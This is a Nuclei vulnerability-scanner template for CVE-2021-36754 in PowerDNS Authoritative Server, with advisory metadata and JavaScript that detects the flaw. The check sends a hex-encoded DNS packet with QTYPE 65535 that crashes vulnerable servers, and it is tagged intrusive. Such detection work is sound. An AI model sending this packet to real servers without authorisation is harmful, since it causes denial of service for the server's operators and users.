id: CVE-2021-36754

info:
  name: PowerDNS Authoritative Server - Denial of Service
  author: daffainfo
  severity: high
  description: |
    PowerDNS Authoritative Server 4.5.0 before 4.5.1 allows anybody to crash the process by sending a specific query (QTYPE 65535) that causes an out-of-bounds exception.
  impact: |
    Attackers can crash the server process, leading to denial of service and potential service disruption.
  remediation: |
    Upgrade to version 4.5.1 or later.
  reference:
    - http://www.openwall.com/lists/oss-security/2021/07/26/2
    - https://doc.powerdns.com/authoritative/security-advisories/powerdns-advisory-2021-01.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36754
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2021-36754
    cwe-id: CWE-119
    epss-score: 0.91828
    epss-percentile: 0.99703
    cpe: cpe:2.3:a:powerdns:authoritative_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: powerdns
    product: authoritative_server
  tags: cve,cve2021,js,dns,powerdns,authoritative_server,dos,intrusive,vkev

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);

    code: |
      const c = require("nuclei/net");

      let conn;
      let isPowerdns = false;
      let isUp = false;

      let validPacket = "1ea0012000010000000000010776657273696f6e0462696e64000010000300002904d000000000000c000a00089f750bc0808677d1";
      let dosPacket = "296e01200001000000000001046f617374026d6500ffff000100002904d000000000000c000a000805dbdf1a40effcf4";

      // Simple test to make sure the DNS server is using the PowerDNS Authoritative Server
      conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(validPacket);
      const result = conn.RecvString();

      if (result.includes("PowerDNS Authoritative Server")) {
        isPowerdns = true;
      } else {
        isPowerdns = false;
      }
      conn.Close();

      // Send DoS Payload
      conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(dosPacket);
      try {
        conn.RecvString();
      } catch {
        //
      }
      conn.Close();

      // Simple test again to make sure PowerDNS is down
      try {
        conn = c.Open('udp', `${Host}:${Port}`);
        conn.SendHex(validPacket);
        conn.RecvString();
        conn.Close();
        isUp = true;
      } catch {
        isUp = false;
      }

      if (isPowerdns && !isUp) {
        Export("Vulnerable to CVE-2021-36754")
      } else {
        Export("Not Vulnerable")
      }

    args:
      Host: "{{Host}}"
      Port: 53

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'Vulnerable to CVE-2021-36754'

      - type: dsl
        dsl:
          - success == true
# digest: 490a0046304402203d26824efdd6c34b4f8fdc8fc082ad0655e2fa56c4b41741b0a3286acbed236d02206774c48b525e72d28da8101ff122fd934c5308ac21218b2644f4885c043be92a:922c64590222798bb761d5b6d8e72950